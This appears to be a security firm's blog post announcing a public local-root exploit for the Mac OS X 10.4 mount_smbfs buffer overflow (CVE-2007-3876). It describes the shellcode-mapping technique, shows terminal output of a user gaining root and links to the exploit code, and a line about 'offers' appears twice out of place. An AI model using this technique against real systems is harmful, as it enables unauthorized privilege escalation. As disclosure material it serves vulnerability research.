We are happy to announce the availability of a 100% reliable exploit against CVE-2007-3876, the 
. We will carefully examine all offers on a case-by-case basis.
mount_smbfs argument stack-based buffer overflow. Using the shared_region_map_file_np() system call, we map a file containing shellcode at a fixed location, with write, read and execute permissions (VM_PROT_EXECUTE|VM_PROT_READ|VM_PROT_WRITE). This technique was first documented publicly in a Phrack article by nemo, and has been partially restricted in Leopard.
On an unpatched Mac OS X 10.4 installation (only without the update fixing this problem) it will allow any user to gain root privileges.
$ ./mount_smbfs_root Mac OS X 10.4.10, 10.4.11 mount_smbfs Local Root exploit Copyright (c) 2007-2008 Subreption LLC. All rights reserved. Mapping shellcode from file via shared_region_map_file_np()... Shellcode mapped: mapping starts at 0x9ffff000, shellcode at 9fffff71 Payload size: 1064 (1040 padding bytes), Return address: 0x9fffff71 mount_smbfs: workgroup name 'AAAA...' malcomx:/Users/nonpriv root# id uid=0(root) gid=501(nonpriv) groups=501(nonpriv), 81(appserveradm), 79(appserverusr), 80(admin) malcomx:/Users/nonpriv root# exit exitIt is available at our corporate public repository, as well as the Milw0rm website.
- Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit (At Subreption public repository)
- Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit (Mirror)
- The original Ruby proof of concept: mount_smbfs_root.rb
. We will carefully examine all offers on a case-by-case basis.
Leave a comment